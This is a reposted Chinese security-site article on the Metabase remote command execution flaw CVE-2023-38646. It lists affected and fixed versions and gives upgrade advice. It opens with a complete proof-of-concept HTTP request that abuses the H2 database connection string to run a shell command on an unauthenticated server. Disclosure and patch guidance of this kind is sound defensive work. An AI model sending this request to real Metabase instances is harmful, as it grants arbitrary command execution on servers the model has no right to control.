Metabase远程命令执行漏洞 (CVE-2023-38646) POC

admin 2024年10月11日10:47:51评论44 views字数 1432阅读4分46秒阅读模式
POST /api/setup/validate HTTP/1.1Host: localhost:3000Content-Length: 416Accept: application/jsonContent-Type: application/jsonUser-Agent: Mozilla/5.0 Connection: close{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{"subprotocol":"h2","classname":"org.h2.Driver","advanced-options":true,"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd})\;}$$\;CALL SHELLEXEC('touch /tmp/xxx');"},"name":"x","engine":"postgres"}}

Metabase远程命令执行漏洞 (CVE-2023-38646) POC

01 漏洞详情

影响组件

Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。

漏洞描述

近日,奇安信CERT监测到Metabase官方发布安全更新,修复了Metabase 远程命令执行漏洞(CVE-2023-38646)。未经身份认证的远程攻击者利用该漏洞可以在服务器上以运行 Metabase 服务器的权限执行任意命令。鉴于此漏洞影响范围较大,建议客户尽快做好自查及防护。

02 影响范围

影响版本

Metabase open source 0.46 < 0.46.6.1

Metabase Enterprise 1.46 < 1.46.6.1

Metabase open source 0.45 < v0.45.4.1

Metabase Enterprise 1.45 < 1.45.4.1

Metabase open source 0.44 < 0.44.7.1

Metabase Enterprise 1.44 < 1.44.7.1

Metabase open source 0.43 < 0.43.7.2

Metabase Enterprise 1.43 < 1.43.7.2

其他受影响组件

03 处置建议

安全更新

目前,官方已发布新版本修复该漏洞,建议用户尽快更新。

https://github.com/metabase/metabase/releases

安全版本:

Metabase open source >= 0.46.6.1

Metabase Enterprise >= 1.46.6.1

Metabase open source >= v0.45.4.1

Metabase Enterprise >= v1.45.4.1

Metabase open source >= v0.44.7.1

Metabase Enterprise >= v1.44.7.1

Metabase open source >= v0.43.7.2

Metabase Enterprise >= v1.43.7.2

原文始发于微信公众号(TtTeam):Metabase远程命令执行漏洞 (CVE-2023-38646) POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月11日10:47:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metabase远程命令执行漏洞 (CVE-2023-38646) POChttps://cn-sec.com/archives/1942356.html

发表评论

匿名网友 填写信息